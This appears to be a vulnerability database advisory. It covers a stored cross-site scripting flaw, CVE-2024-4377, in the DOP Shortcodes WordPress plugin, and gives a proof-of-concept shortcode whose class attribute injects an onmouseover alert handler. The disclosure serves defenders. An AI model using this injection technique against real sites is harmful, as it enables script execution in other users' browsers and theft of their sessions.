WordPress Plugin Vulnerabilities

DOP Shortcodes <= 1.2 - Contributor+ Stored XSS via Shortcode

Description

The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks

Proof of Concept

Add the following shortcode to a post:

```
[dopaccordions class='wp-block-search__button" onmouseover="alert(/XSS/)"']
[dopaccordion title="Title 1"]text[/dopaccordion]
[dopaccordion title="Title 2"]text[/dopaccordion]
[dopaccordion title="Title 3"]text[/dopaccordion]
[/dopaccordions]
```

Move your mouse over the accordion to see the XSS

Affects Plugins

Plugin icon
dop-shortcodes
No known fix

References

CVE
CVE-2024-4377

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher
Bob Matyas
Submitter
Bob Matyas
Submitter website
https://www.bobmatyas.com
Submitter twitter
bobmatyas
Verified
Yes
WPVDB ID
778cebec-bdbb-4538-9518-c5bd50f76961

Timeline

Publicly Published
2024-05-31 (about 30 days ago)
Added
2024-05-31 (about 29 days ago)
Last Updated
2024-05-31 (about 29 days ago)

Other

Published
Title
Published
2023-09-06
Title
Newsletter < 7.9.0 - Contributor+ Stored XSS
Published
2023-09-22
Title
Copy Anything to Clipboard < 2.6.5 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Published
2022-05-09
Title
Birthdays Widget <= 1.7.18 - Admin+ Stored Cross Site Scripting
Published
2023-01-18
Title
Youtube Channel Gallery <= 2.4 - Contributor+ Stored XSS via Shortcode
Published
2021-10-06
Title
Age Gate < 2.16.4 - Authenticated Stored Cross-Site Scripting